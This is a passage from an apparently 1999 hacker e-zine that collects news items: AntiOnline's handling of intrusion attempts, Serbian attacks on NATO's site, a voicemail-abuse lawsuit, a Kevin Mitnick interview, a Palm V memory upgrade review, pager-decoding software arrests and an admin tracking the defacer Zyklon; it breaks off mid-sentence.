the router (You can find out ALL SORTS of interesting things by doing this). By having all of this data archived and put into a database, it will allow us to use it in other, more advanced applications in the future. OH MY GOD IT'S A HACKER!!! (Calling their ISP doesn't cut it, we have to stand up for ourselves!): Many people have asked us what we "do" with the logs of hack attempts against us that we see on a daily basis. Well, unlike many organizations, where hack attempts are viewed as "events" which are to be "looked into", hack attempts against AntiOnline are the rule, not the exception. As a policy, we do not "turn over" any hack attempts for investigation by any governmental authorities, nor would we do so if a hacker actually managed to gain access to one of our systems. Due to the type of organization that we are, we feel that would be hypocritical. We feel that the important thing for us to do is "secure" our network, because trying to intimidate people from attempting to hack us for fear of prosecution is ridiculous (something which sounds common sense, but our government is just now realizing the significance of it). We may do several things with users that make "hack attempts" against us. First off, it's logged and sent to our database. We identify trouble users, and "take action" as we see fit. A few examples of what we may do: On common hack attempts, the user's IP address or domain is dynamically posted on our "hack attempts" page, along with the type of attack the user tried. We set up a host_deny list for apache using mod_rewrite (Very cool stuff. If you're not familiar with mod_rewrite, I strongly suggest looking into it. We use it extensively.), which allows us, or our system, to add ip entries, causing the user to get a 403 access forbidden when attempting to visit the page. If the "user" has done several hack attempts against us, the system may escalate the attempt, and actually set up a deny statement in our router, which stops the host from even passing data into our lan. Our mail server uses the MAPS (Mail Abuse Prevention System) Real Time Black Hole List, to prevent spam. Any spammers that we observe are submitted to the list as well. There are several other responses that we are currently experimenting with, including the ever controversial "retaliatory" ones (don't try that one at home kids). Neighborhood Watch (The woman across the street with a pair of binoculars, or BugTraq?) One of the things that we spend a lot of time and resources on is gathering "intelligence". Finding out about the latest discovered vulnerabilities is something nearly every responsible administrator does, and is something that nearly every responsible security administrator is obsessed with. But, we take things one step further. Not only do we try to keep up with the latest exploits and vulnerabilities, we also try to keep up with the latest THREATS. Exploits are no danger to a system at all, if there's no one trying to use them against you. But, as with many networks, there never seems to be a limited supply of people willing to use those exploits against us. So, one of the things that we do (and dedicate a lot of resources to), is gathering intelligence. What are the active hack groups? Who's in those groups? What groups were those people in before this one? What exploits were used? What are their motives? What are they saying to other hack groups? What sites have they hit? What domains do they have access to? So on and so on. Although we realize there is no way to determine every possible person out there who may get the whim one evening to attempt a serious hack, we have found in the past being able to do such a "risk assessment" has allowed us to deflect many serious hack attempts against us (now, to be perfectly honest, this information also helps in our news coverage of hacks, etc. and also provides us with some VERY interesting research data for use with our experimental Hacker Tracker). On top of that, we do a lot of the standard "vulnerability and exploit" monitoring as well. Keeping up with BugTraq, NT BugTraq, RootShell, CERT (which is a great way to learn about vulnerabilities which were discovered a few months ago, hah), as well as a slew of hacker mail-lists, zines, news groups, and IRC. Great, We're Finally Secure (No we're not.) I'm going to end this little ditty with a phrase that I use often, and always try to keep in mind: "Securing A Network Is A Process, Not An Event" If you've gotten nothing else out of this report, I hope that you remember that one sentence. It's the best piece of advice that any security guru could give you. Let me use the following analogy: You work hard, save your money, and establish your credit. Finally, you're able to build that special house that you've always dreamed of. You get the best architect to draw the blueprints, and hire the best contractors to build it. You even have a landscaper come in to put on the finishing touches. Now, your house is finished and flawless. However, does that mean that your never going to have to work on it again? Your home takes constant care. Washing, cleaning, and yard work on a regular basis to maintain it. New carpet, roofing, and paint every few years to keep your house in perfect order. Think right now, what your house would look like if you just "left it". Soon the dust bunnies would move in, followed by that "I went on vacation in the summer and the house was closed up for a week and a half" smell, and the ever so shameful "I went to pour milk on my cereal and it came out of the carton in lumps". After a while, you would start noticing water from the ceiling dripping onto your carpet during a rain, and the mushrooms and other fungus would begin growing off of those dust bunnies which are now the size of elephants. Not a pretty site, is it? Unfortunately, many system admins don't look at their network the same as they would their new house. After the contractors leave, they simply lay back and enjoy. Sure, it looks and works great at first. he office has that "there are thousands of dollars of brand spankin new technology in here" smell (come on, all you techies know the one), and you're sitting pretty high on your new office chair (the kind that has a lever on the size that let's you drop your seat to it's lowest position at the end of the day, swing yourself from out under the desk, and the remains spinning for at least three minutes after you've gotten into your car). But soon, the hub's collision lights start going on more and more frequently, the chair refuses to go in the up position until you get off of it, and you're wrists are no longer positioned at that perfect "I hope I don't get the syndrome" position. You get the idea. @HWA 22.0 NATO fights Serbs online. ~~~~~~~~~~~~~~~~~~~~~~~~~ From PCWorld http://www.pcworld.com/pcwtoday/article/0,1510,10391,00.html story NATO Fights Serbs Online Military headquarters shores up Web site against Serbian hacker attacks. by Elizabeth de Bony, IDG News Service April 2, 1999, 5:03 p.m. PT The North Atlantic Treaty Organization has started defensive measures to protect its e-mail and Web site systems against a well-prepared propaganda campaign launched by Serbian hackers. NATO is taking the measures "as soon as possible, but given the size of the problem, it will be difficult," a source at NATO military headquarters confirms, declining to provide any details. "These are open systems, and although we do not want to close them to the public, this is an option." The disruptions began last weekend, three days after NATO began its bombing missions. That afternoon a hacker in Belgrade saturated the NATO site with "ping" bombardment--a tactic in which one computer automatically and repeatedly calls another. On a daily basis, another Belgrade-based hacker floods NATO's e-mail system with nearly 2000 messages. The e-mail introduces up to five additional computer viruses into the system. "This is clearly a new element in warfare in the twenty-first century," the source says.The risk is that without a rapid solution, the hackers may move on to more damaging activities, such as downloading press releases and imagery available on the site, tampering with them, and then releasing them as official documents. "All of this is well prepared, and part of Milosevic's propaganda war," the source explains. -=- from C|Net NATO site, email suffer hacks By Reuters Special to CNET News.com March 31, 1999, 4:00 p.m. PT BRUSSELS--NATO said today that Yugoslav hackers had broken into its Internet home page and jammed its email system with 2,000 messages per day. NATO spokesman Jamie Shea said service on NATO's home page had been "erratic to say the least" since March 28, the fifth day of the alliance's bombing campaign against Yugoslavia. "It seems that we have been dealing with some hackers in Belgrade, who have hacked into our Web site," Shea told a news conference at NATO headquarters in Brussels. "At the same time, our email system has also been saturated by one individual who is currently sending us 2,000 emails a day. We are dealing with macro viruses from Yugoslavia in our email system," he said. A senior NATO diplomat said it was clear how well-organized and prepared Belgrade's offensive was: "It ranges all the way from organized ethnic cleansing to messing up our Web site." Shea added: "Let me assure you that despite these technical glitches, you will continue to receive updated political and operation information from this alliance." Story Copyright © 1999 Reuters Limited. All rights reserved. http://www.news.com/News/Item/0,4,34508,00.html?owv Story on C|Net @HWA 23.0 Chicago man sues employer over having week voicemail security. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Silicon Valley.com http://www.mercurycenter.com/svtech/news/breaking/merc/docs/006063.htm Link Posted at 6:53 a.m. PST Friday, April 2, 1999 Man sues employer over voice-mail abuse CHICAGO (AP) -- A suburban Chicago man is suing his employer for allegedly failing to adequately secure the company voice-mail system, even after he complained that someone had hacked into the system and was passing offensive messages about him. ``I hope that this makes other companies look at their systems and say, 'Gee, could this happen with our company?' '' Gary Thompson, 45, said Thursday from his home in Wheaton. ``I would be willing to bet most companies haven't even thought about this.'' Thompson, who is suing both Jewel Food Stores and its parent, Utah-based American Food Stores Co., claims that on five occasions beginning in 1996, someone posing as a private investigator hired by the company left false and defamatory messages in the voice-mail boxes of hundreds of American Stores' employees nationwide. The messages included claims that he had HIV, was a drug user, cheated on his wife with company secretaries and stole from the company. ``I started being treated differently immediately after the first message. Work associates stopped shaking my hand,'' said Thompson, who is on disability leave after suffering what he described as severe depression in the wake of the voice-mail attacks. One day Thompson found a note on the front seat of his car in which the author said they understood he was dying of AIDS and wanted to know how to apply for his reserved parking space. ``Those kinds of things start to build up and get to you,'' he said. ``No one could know or understand what it's like to be in my shoes.'' While the law has begun to adapt to issues of privacy and copyright infringement relating to the Internet and e-mail, voice mail has produced a similar set of concerns. ``As technology advances, people are finding new ways of abusing of it,'' said David Loundy, a Chicago attorney specializing in technology law. ** Voice-mail security was at the crux of the dispute last year between Chiquita Brands International and a Cincinnati Enquirer reporter who broke into the company voice-mail system to gather information for a story that was highly critical of Chiquita. The reporter's work was later retracted, and he and a Chiquita employee were prosecuted for tampering with the voice-mail system. The reporter later pleaded guilty to two felony charges. ** Thompson's lawsuit, filed in January in DuPage County Circuit Court, seeks in excess of $50,000 in damages and also names as a defendant ``John Doe,'' the unidentified person who allegedly obtained a distribution password enabling him to send the messages companywide. Thompson said he assumes the messenger is a former employee he may have dismissed. The company insists it reacted swiftly to Thompson's concerns. ``We believe that the allegations are unfounded,'' said Karen Ramos, a spokeswoman for Jewel. ``The company took immediate and appropriate action in response to the unauthorized voice-mail messages in question.'' Thompson's lawyer, Maureen Murphy, said companies are responsible for the systems they offer employees. ``A little bit more of the burden has to be placed on the company to ensure security against the magnitude of damage that can be done to people with the stroke of a key,'' she said. ``(Companies are) the only ones in a position to stop it.'' One legal expert said while there's no previous case law to draw on for Thompson's lawsuit, the old tenets of law apply. ``It would be kind of like if you had a job in a factory and they gave you a tool to work with that was faulty and you got injured,'' said George Trubow, director of the Center for Information Technology and Privacy Law at the John Marshall Law School in Chicago. It is a ``fairly classic, old-fashioned approach to employer liability.' @HWA 24.0 Mitnick speaks in a rare q and a, (Forbes) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Via [ISN] Forwarded From: William Knowles http://www.forbes.com/tool/html/99/apr/0405/feat.htm Link By Adam L. Penenberg Forbes Digital Tool 4-5-99 Kevin Mitnick is the most famous hacker in history. He has been in prison for more than four years for crimes that, when you get down to it, amount to little more than illegally copying proprietary software belonging to major companies including Motorola, Nokia and Sun. He was made a household name by New York Times reporter John Markoff, who featured Mitnick in a book called Cyberpunk (published in 1991), then wrote a front page story for the Times on July 4, 1994, that portrayed Mitnick as a superhacker who could wreak cyberhavoc--and ruin lives--if not caught by the Feds. Then a funny thing happened. Markoff's friend, Tsutomu Shimomura, claimed that Mitnick had hacked his home computer on Christmas Day, 1994, and went after him, with Markoff in tow. When Shimomura tracked Mitnick down in North Carolina, Markoff was there for the kill. This was documented in subsequent front-page stories and a book called Takedown, for which Markoff and Shimomura shared a $750,000 advance. Expect the movie version soon. Markoff became a journalism star as a result of his crusade. Shimomura's name, in the ultimate geek tribute, is recognized by Microsoft Word98 spell check. Not even Sherlock Holmes can say that. Yet, according to Dale Coddington and Brian Martin, both of whom were hired by the defense to comb through the 9 gigabytes of electronic evidence amassed against Mitnick, there is no proof that Mitnick hacked Shimomura. For all the fanfare it received, it was never contained in the indictment. Yet, the media coverage has had a profound impact on Mitnick's case. Mitnick reads everything written about him and says he often can’t believe what he reads. He has seen himself portrayed as a "dark side" hacker intent on toppling civilization; a criminal who as a teenager penetrated computers at NORAD, inspiring the hit flick War Games; a phone phreaker who, just by whistling three tones into a telephone receiver, could launch World War III; and a computer hacker who, merely armed with a computer sans modem, could wreak cyberhavoc from his jail cell. But the reality is a lot less sexy. Kevin Mitnick is a recreational hacker with a compulsive-obsessive relationship to information. He hoarded information, never sold it, and wouldn’t even share it with his friends.. Although he is portrayed in the upcoming film Takedown as an evil menace to society, Mitnick is really just your average geek who has done some bad things in his life, and has paid the price. To this day, he would like nothing more than to dissect some computer program to see how it works. Says Martin, who often visited Mitnick in prison, "Kevin still wants to look through cellular source code to see how it works. You can see it in his eyes that he'd love to kick back with a printout and just figure it out on his own." Mitnick doesn’t trust the media. But he agreed to let Forbes interview him over a span of several evenings recently by telephone. Here is Kevin Mitnick in his own words: Forbes.com [F]: How would you characterize the media coverage of you? Mitnick [M]: When I read about myself in the media even I don't recognize me. The myth of Kevin Mitnick is much more interesting than the reality of Kevin Mitnick. If they told the reality, no one would care. [F} Have stories that John Markoff wrote about you in The New York Times had any impact on your legal proceedings? [M} Markoff has single-handedly created "The Myth of Kevin Mitnick," which everyone is using to advance their own agendas. I wasn't a hacker for the publicity. I never hacked for personal gain. If I was some unknown hacker, accused of copying programs from cell phone companies, I wouldn't be here. Markoff's printing false and defamatory material about me on the front page of The New York Times had a substantial effect on my case and reputation. He's the main reason I'm still in custody. [F] The Times continues to report (most recently on March 18) that you had hacked NORAD. Is this true? [M] No way, no how did I break into NORAD. That's a complete myth. And I never attempted to access anything considered to be classified government systems. [F] What do you think about hacks done in your name--for instance, last September's hack of The New York Times web site. Do they further your cause? [M] I don't condone anyone causing damage in my name, or doing anything malicious in support of my plight. There are more productive ways to help me. As a hacker myself, I never intentionally damaged anything. [F] How have you spent most of your time in prison? [M] Most people here are content watching TV, playing pinochle, dominoes and poker. I work on my defense 14 hours a day. [F] What do you think of the restrictions placed on you when you get out of prison as part of your plea agreement? [M] The requirements mandating I can't touch a computer or cell or cordless phone are akin to telling a forger not to use a pen or paper. There is no way I can earn a living when I get out. I couldn't even work at McDonald's. All I could do is something like gardening. [F] What do you plan on doing when you get out of prison? [M] "I don't know, but once I get out of here and get on with the rest of my life, I'll never intentionally violate the law." What do you think about Kevin Mitnick? Let us know in our forum. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 25.0 Australian stock exchange to carry out threat on Y2K slackers.... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Spikeman This article is located at http://newswire.com.au/9904/name.htm Aussie Link 06/04/99 16:45 ASX to name Y2K offenders William Maher The names of companies that have not disclosed the state of their Y2K preparations will be released tomorrow morning by the Australian Stock Exchange (ASX). The ASX decided to carry through with the threat after it received a poor response to its latest Y2K survey of publicly listed Australian companies. Under a bill passed earlier this year, those companies must reveal the state of their Y2K compliance or face suspension by the ASX. ASX spokesperson Gloria Peterson said that the response to the latest survey had been "disappointing". A total of 1,148 companies were required to disclose details of their Y2K preparations, but a significant proportion failed to meet the March 31 deadline. "A great many companies are already suspended for something and just thought they didn't have to respond. But they were wrong," said Peterson. Similarly, the Australian Securities and Investments Commission (ASIC) is also experiencing a poor response to its demands for Y2K details. Only half of the 700 financial brokers and investment advisors responded to ASIC's latest survey. ASIC spokesperson Steven Blaney said that over 3,000 firms have now been given until mid-May to submit their details, or face action from ASIC staff. "I think that people will realise we are taking this issue very seriously. If they don't respond they should expect a visit from ASIC staff," he told Newswire. Blaney added that problems were confined to a small number of firms which had not responded to demands for more information. For the most part, Blaney expects firms to be on track with preparations for 2000. "ASIC has quite a range of powers [to deal with non-respondants], but I don't think it will come to that," he said. In related news, major insurers have limited their insurance policies covering Y2K-related disasters . The Insurance Council of Australia has said insurers are entitled to limit their policies because potential losses due to the millennium bug are foreseeable. @HWA 26.0 Hacking the palm pilot V ~~~~~~~~~~~~~~~~~~~~~~~~ http://www.wired.com/news/print_version/technology/story/18937.html?wnpg=all link http://www.wired.com/news/news/technology/story/18937.html link Memory Boost for Palm V by Leander Kahney 3:00 a.m. 3.Apr.99.PST A Silicon Valley engineering firm is offering an 8-megabyte memory chip for users hungry to expand the un-upgradeable Palm V. Because of its small size, sleek look, bright screen and rechargeable batteries, 3Com's new Palm Pilot V is selling well, despite its hefty US$450 price tag and slim 2 MB of memory. But thanks to the ingenuity of Palm hackers, the miniscule memory chip can now be replaced with a whopping 8-MB module. The procedure was first described by Japanese hacker Toshio Kashiwagi, who posted detailed instructions on the Web, with the following warning: "You might have to prepare yourself for breaking the machine." Kashiwagi used a hairdryer on low power to carefully melt the unit's sealant. After soldering a new RAM chip onto the motherboard, he super-glued the two halves back together. Electronic Fast Integration Group, an engineering consulting firm based in Los Altos, California, will perform a similar upgrade for US$150. The company is planning to offer pre-upgraded units for US$600. "This does void the warranty from 3Com," cautioned John Warren, a partner in the firm. "Once we modify them, 3Com won't take them back. They won't support the customer at that point, so we have to do it." For an extra US$40, EFIG is offering its own one-year warranty, which takes care of everything originally covered under the 3Com warranty. Even though the Palm V's 2MBs of memory was made to handle 5,000 addresses, 5 years of appointments, 1,500 to-do items, 1,500 memos and 200 emails, users have been clamoring for the upgrades. The success of the Palm has spawned a bewildering variety of applications for Web surfing, paging, scheduling, and even street maps and games -- all of which quickly chew up memory. Warren said EFIG has been swamped with orders since it began offering the service last week. But he noted that the company had ruined about six Palm V's in the process of refining the procedure, and he cautioned inexperienced hackers from trying it at home. "It's a disaster normally," he said. "You have to be prepared to have a few throwaway units." News of the upgrade persuaded Albert Lee, a Palm nut who has owned every model of the Pilot over the years, to buy the Palm V. "I didn't think I would have the Palm V at all if it wasn't for EFIG's upgrade," Lee said. "Two megabytes of memory is just a bit too tight." Two days after buying it, Lee shipped his unit to EFIG. It was returned four days later, and Lee wrote a glowing review. "I think it was really exceptional work," he said. "I was a little bit worried about how they were going to reseal the case. But the results put my doubts to rest." "This does void the warranty," said a spokesperson for 3Com. "Our research shows that most users don't use two megabytes of memory and would have a hard time finding a use for eight megabytes." Lee's review; ** Disclaimer: I have no affliation with EFIG.com -- this review is done with my personal Palm V. http://www.cavecreations.com/palmv8/ link Overview The Palm V (formerly code-named "Razor") is Palm Computing's latest entry into the PalmOS palmtop computer line. With this device, Palm Computing reaffirms itself as a leader in handheld computing. While other competing HPC WinCE devices concentrate on color, more memory, and multimedia features, the Palm V retains the most attractive characteristic of PalmOS devices -- simple is better. The PalmOS itself has not changed much (PalmOS 3.1) over the years. It retains the elegant interface that allows tasks to be completed with little learning. While HPCs are becoming more competitive, they require significantly faster processors and more memory to perform on par with the PalmOS. The Palm V introduces a few improvements which, while evolutionary, are well worth the $449 price of entry. Most significant is the sleek new body design, which is slightly smaller in length and width than previous Palm devices, but reduces thickness to an amazing 0.4". The body is made of anodized aluminum and is easy to hold. This design is supplemented by a new Epson display, which significantly improves contrast and reduces reflection when compared to earlier Palm devices. The contrast dial has been removed, in favor of a software based contrast control activated by a button on the top of the unit. The AAA battery bay has been removed in favor of an integrated Lithium Ion battery that promises 1 month of use under regular conditions. The serial port and HotSync cradle have been redesigned to allow charging of the Lithium Ion battery when the unit is resting in the cradle. The Palm V is equipped with 2 megabytes of RAM. Overall speed has been improved thanks to the new 16mhz Motorola DragonBall EZ CPU. This CPU is essentially the same as previous CPUs, but with less wait states. Additionally, the PalmOS 3.1 has been recoded and optimized for the EZ processor, contributing to the snappy response. 16mhz does not sound very fast until it is experienced with the PalmOS. The operating system is extremely efficient, and offers virtually no delay. Palm V8 by EFIG.com While Palm V sales have been brisk, keeping prices high, die-hard Palm users had much to complain about the Palm V. While they loved the new industrial design, and raved about the changes throughout the Palm V, nobody was really that excited about the 2 mb of RAM in the unit -- especially since the unit is sealed and non-upgradeable. Leave it to the netizens to figure out how to open the case and upgrade the Palm V to an amazing 8 megabytes of memory! The first prototype came out of Japan thanks to Toshio Kashiwagi. This page, was later translated into English by John Lagerling. It caused quite a stir. Toshio had successfully unsealed the Palm V without damage, and upgraded the memory to 8 mb using a few tools and a new memory chip. Suddenly, the Palm V became a lot more appealing. People everywhere wanted the 8 meg Palm V, but clearly not many people had the skill or the equipment to do the upgrade themselves. John Figueroa of EFIG.com now offers what everyone has been asking for -- a Palm V upgrade service. Mr. Figueroa will upgrade your Palm V to 8 megabytes for the surprising low cost of $150.00 USD. Additionally, he plans to sell Palm V units pre-installed with 8 megs of memory for $600.00 USD. Skeptical? Interested but afraid to ship your $400+ unit to EFIG.com for an upgrade? Well... I'm going to take the chance and find out for everyone! Let's find out a little bit more about me and my unit. Why I Waited I have every single Palm Computing device since the very first "Pilot", which had no backlight! A lot has changed since then, and as every Palm upgrade has come out, I could always justify the upgrade. My Palm III went with me everywhere I went, and I relied on it to keep my life organized. I have owned Newtons, many HPs (100LX,200LX,300LX WinCE), as well as several odd palmtops (anybody still remember the Poqet computer?). The Palm Computing line of handheld computers were the first ones that didn't end up in the nightstand. Size, weight and simplicity was what continued to sell me. When the Palm V came out, I was first in line for one -- until I realized there was no memory increase from my existing Palm III. Following the history of all my Palm devices, memory has always doubled. The Pilot 5000 had 512k, the PalmPilot Professional had 1 mb, and the Palm III had 2 mb. While I never really filled up the memory of the 2 mb model, I hesitated buying a Palm V because it was non-upgradeable -- if it ever came to the point where I needed more than 2 mb of memory, I was stuck buying a new unit. In the end, there really is no incentive for me to spend $400+ to get a unit with the same amount of memory as my Palm III. Preparing for the Palm V8 When John Figueroa of EFIG.com offered his upgrade service for the Palm V, I decided it was time to get the Palm V. The elegant design, and a realized 8 mb of memory would make this device perfect for my needs. While Mr. Figueroa's business seemed to be legitimate, I was still a little skeptical. The fit and finish of the Palm V is exceptional -- letting someone crack open such a tightly sealed device is enough to make anyone nervous. Things I've taken apart never end up looking the same, or working as well. But someone always has the be first to try new things. Let's take a look at my Palm V, which I purchased brand new from Staples on March 17, 1999. Full View (follow link for story and images) Top View (follow link) Bottom View (follow link) Side View These images represent a view of the Palm V from 4 sides. You'll notice that the unit is extremely thin, with a very fine seam (only really visible from the top and bottom views). The Upgrade The entire upgrade process, from shipping to receiving, should take 4 days. Since I shipped on a Thursday, and John is still ramping up for production, it will take slightly longer. His overall policy is "In by Monday - ships on Thursday". Thursday, March 18, 1999 John Figueroa gives the go-ahead to ship my Palm V. I back up my entire Palm V using BackupBuddy NG, and perform a hard reset. The Palm V hard reset is tricky... hold down the power button, press and hold in the reset hole for at least 2 seconds, release the reset hole, then release the power button (in that order). Hit Scroll Up to erase the memory. I HIGHLY RECOMMEND you use BackupBuddy, even if you never upgrade your Palm. Losing data is never fun. I stop by Federal Express station in King of Prussia, PA at around 6:30p. I shipped my Palm V via FedEx Priority Overnight ($24), and is guaranteed to be at EFIG by 10:30a. Remember to have EFIG.com's phone number (408-739-8002) when you ship -- the FedEx form has a space for it. Friday, March 19, 1999 Spent the morning on the FedEx website tracking the package. Got a little impatient until I realized that there was a 3 hour time difference. :) My Palm V arrived at EFIG.com at 9:32a Pacific. The Tracking was as follows: Delivered To : Recept/Frnt desk Delivery Location : SUNNYVALE CA Delivery Date : 03/19 Delivery Time : 09:32 Signed For By : T.MAIDEN Status Exception : Payment Received Scan Activity : Delivered SUNNYVALE CA 03/19 09:32 Placed on Van SUNNYVALE CA 03/19 08:42 Arrived at FedEx Destination Location SUNNYVALE CA 03/19 08:39 Left FedEx Sort Facility OAKLAND CA 03/19 04:50 Left FedEx Origin Location KING OF PRUSSIA PA 03/18 19:49 Pickup Exception KING OF PRUSSIA PA 03/18 18:29 It's in John's hands now! John has notified me "We will upgrade it with the first batch of the week". Monday, March 22, 1999 John writes me a brief email to confirm my shipping address so that he can pre-print labels. Things still look on schedule to receive my unit back toward week's end. Tuesday, March 23, 1999 John has emailed me with the following information: "Your unit has been sealed and is getting our first serial number prototype today at 11am (my note here: 2:00p Eastern), should ship today too.". John emails me to let me know the FedEx tracking number for my package. It's guaranteed by 10:30a Wednesday. Getting The Unit Back Wednesday, March 24, 1999 Today is the big day!!! Here's the FedEx tracking information as my Palm V traveled back from Sunnyvale, CA: Delivered To : Recipient Delivery Location : WAYNE PA Delivery Date : 03/24 Delivery Time : 09:54 Signed For By : A.MCGUIRE Status Exception : Scan Activity : Delivered KING OF PRUSSIA PA 03/24 09:54 Placed on Van KING OF PRUSSIA PA 03/24 08:27 Left FedEx Sort Facility MEMPHIS TN 03/24 04:12 Left FedEx Sort Facility MEMPHIS TN 03/24 02:35 Left FedEx Origin Location SUNNYVALE CA 03/23 17:10 Picked up SUNNYVALE CA 03/23 17:07 My girlfriend calls at 9:55a -- THE PALM V IS BACK! Took an early break, and drove home. Looks like the unit was packaged extremely well. It was boxed, and wrapped tightly in bubble wrap. The actual unit is in a static safe bag. The unit turns on easily, and the power indicator seems to be down just a little. I HotSync and BackupBuddy restores my databases, and my software to pre-shipping condition (1.5 mb takes about 10-15 minutes to reload). The power indicator reads 3.96 volts (4.07 is fully charged on my unit). It's nice to see ALL THAT MEMORY in my Palm V. The bottom gap (as mentioned in two other reviews) is minor, but there. If I didn't know better, I wouldn't be able to tell. There are no pry marks or scars on the unit. Initial verdict: The workmanship is exceptional. 8mb is great. Happy to have my unit back! A Closer Look After the Upgrade If you're really concerned with how the case looks after the upgrade, you don't need to worry that much. There IS a wider gap in the seam, but the case doesn't budge if I try to pull it apart, or push the seams together. It isn't that noticeable unless you put two units side-by-side (see The Gadgeteer review). It still fits in the Hotsync cradle -- if the gap was bad enough, it wouldn't fit. Honestly, I don't know what I'm doing with 8 mb of memory. :) I've always gotten by in the 2 megs of space in the Palm III. The best thing to do is go ahead and install a bunch of programs. I hopped online and purchased the AccessGuide to NYC ($14.95) and Quo Vadis mapping software by Marcosoft ($64.95). AccessGuide is approximately 230k, and Quo Vadis is about 90k for the main program, plus all the maps you want (I went ahead and got 2 megs worth of maps for the regions I'm in the most (Philadelphia, Boston and New York City). Additionally I downloaded a bunch of DOC files. As you can see, I still can't seem to fill it up. I guess I should be pretty happy! Even if I tried, I bet I couldn't get more than 5 megs of software into the Palm before I run out of things I want to put on it. Performance I topped off the battery, and started playing. So far, I haven't noticed any performance difference, or battery difference. Obviously, I've only had it back for a few hours so I'll update with long-term effects as I go along. Conclusion It's only been a few hours, but first and foremost, for $150.00 USD, this is the cheapest, and best way to get 8 megs into your Palm V without attempting to do the upgrade yourself. Mr. Figueroa has definitely demonstrated his ability to open and upgrade the Palm V without damaging the unit. The unit is sturdy, and feels brand new. My Palm V was only 2 days old prior to shipping to EFIG.com, so it's good to know my unit is still in one piece! EFIG.com kept an open line of communication with me throughout the upgrade progress. This was especially comforting since they were ramping up for mass upgrades -- during even the busiest times, John took a minute to keep me posted. I HIGHLY and WHOLEHEARTEDLY recommend the EFIG.com upgrade. There is no reason to worry. This one is for real! Battery Life Of all the emails I am getting, 95% of them have asked me, "how has battery life been affected?". Well, it's really hard to say at this point. Other than the fact the unit only came back recently, the biggest thing is everytime you HotSync, you charge the battery (something you should do everyday, anyway). Every night, if you leave it in the charger, it tops off your battery. In my case, I just add it to my regular evening routine... drop the StarTAC into the charging cradle, plug the Thinkpad into the charger, drop the Clik! drive into the charging cradle, and now drop the Palm V into the cradle. So what if you're away on vacation? Well, I guess you could bring your cradle (it's really NOT that big a deal), or buy the travel kit. So enough preaching... you still want to know how long the Palm V with 8 megs will last. Battery Life Study EFIG Engineering presented their battery life study, and displays the following statistics: (follow link to see chart) As you can see from EFIG.com, while the unit is off, battery drain is more severe vs. the stock Palm V. However, battery life is improved while the unit is on and idle. Now you've seen their estimates, let's do a real life test. I went ahead and switched my Palm V to do an infrared HotSync. This will enable me to be completely without cradle. I screwed up royally, so my last experiment needs to be ditched. On March 30, I will charge up to a full 4.02V and we will document a day-by-day account of battery life without charging. I will HotSync twice a day via IR, and continue to use my unit like I normally do every day (looking up phone records, entering appointments, regular alarms, PocketQuicken, tinkering with applications, etc.) It's not in a controlled environment, so your results will vary from mine. However, I think it will be fairly representative of what typical use will yield with a Palm V upgraded to 8 mb while AWAY from the cradle -- again, if you HotSync with the cradle, you are recharging and the study is useless to you because your battery will keep topping off. (follow link to see chart) Why not to do the upgrade yourself: http://palmvadventures.webjump.com/ PalmVadventures (n.b It seems the instructions to perform the upgrade have been pulled from the web if anyone has a link to an english page with the procedure listed please email me tnx .. - Ed ) @HWA 27.0 MDT software mentioned in last issue warrants arrests ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN www.hackernews.com contributed to HNN by Silicosis There's some weird shit going down with decoding radio data signals. After the arrest of Bill Cheeks by the Secret Service yesterday many people are very nervous as to what will come next. Both WinFlex & PocFlex, windows/dos pocsag/flex/golay decoders have pulled the software as both developers feel as if they're going to be under serious legal fire from Motorola. WinMDT also pulled it's software, most likely due to the recent busts. Interesting that Motorola developed and owns the patent on both flex/reflex and mdc4800 (mdt). Here is a mirror of the latest version of some of the MDT decoding software. You better grab it now before it too disappears. SCANNER TX/RX DECODE SOFTWARE ETC. http://www.kmed70.freeserve.co.uk/kmed70/software.htm Link With the rush to press we missed this link yesterday but here is Bill Cheeks web site. Lots of good info there that may disappear soon. Scannist Extraordinaire http://www.comtronics.net Link @HWA 28.0 Hot on the trail of Zyklon? BUSTED! ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ April 3rd via HNN, The Toronto Star; Article scan w/picture http://www2.thestar.com/thestar/back_issues/ED19990403/news/990403NEW04_FO-HACKER3.html Link Hack attack: My search for Zyklon He infiltrated my Web site; I tracked him to his lair By John Howell Special to The Star My battle with the Nazi-inspired hacker Zyklon began on a ordinary Monday last March. At the time, I was computer network supervisor for a large Toronto company. I received a call from a fellow employee, who told me he thought the company Web site ``looked strange.'' I called up the site on my notebook computer, and what I saw stopped me in my tracks. Scrawled across the corporate Web page, something which is potentially viewed by tens of thousands of people, was the declaration: ``THIS SITE IS 0WN3D BY ZYKLON!'' My site had been ``hacked,'' vandalized by an electronic thug. He was very proud of what he'd done. He had named himself for Zyklon-B, the gas used by the Nazis to exterminate Jews in the concentration camps of World War II. He wrote ``OWN3D'' instead of ``OWNED'' to imitate the lingo favoured by gangsta rappers. I contacted our site's Webmaster and together we replaced the vandalized Web page. But the implications of what Zyklon had done were much more serious. The feeling of having been violated would not go away. I decided to track Zyklon to his lair. I am a computer geek. I spend my whole day working on large computer networks. I design, optimize and troubleshoot them. I love the way computers work and when they don't it's even more fun to psychoanalyze them. And I've been following hacking techniques since I started computing in the early 1980s. A hacker exploits weaknesses within computer systems to access, modify or destroy the information of the computer. In most cases hackers will embarrass a company by changing its Web page into a pornography page. The more sophisticated hacker will access a computer and never let anyone know. He - and it's almost always a ``he'' - just sits and watches and learns, plotting destruction. Let's get this straight: Hackers are criminals, and smug ones at that Let's get this straight: Hackers are criminals, and smug ones at that. To hackers, only their immediate team of hacker friends are ``elite.'' They hold all other users of the Internet in complete contempt, calling them ``lamers.'' On the Internet you are never completely safe. It's like being an excellent driver. No matter how good a driver you are, another driver can always crash into you. The vast majority of hackers these days are copycats following from recipe books of hacks, known as ``exploits.'' There are literally thousands of exploits a hacker can do, making it pitifully easy to destroy or disable a computer system. After we fixed the damage to our Web site and closed the access that Zyklon had used to change it, I got busy finding out about him. I began by making many, many searches on my favourite Web search sites, Yahoo! and AltaVista. I typed in search terms 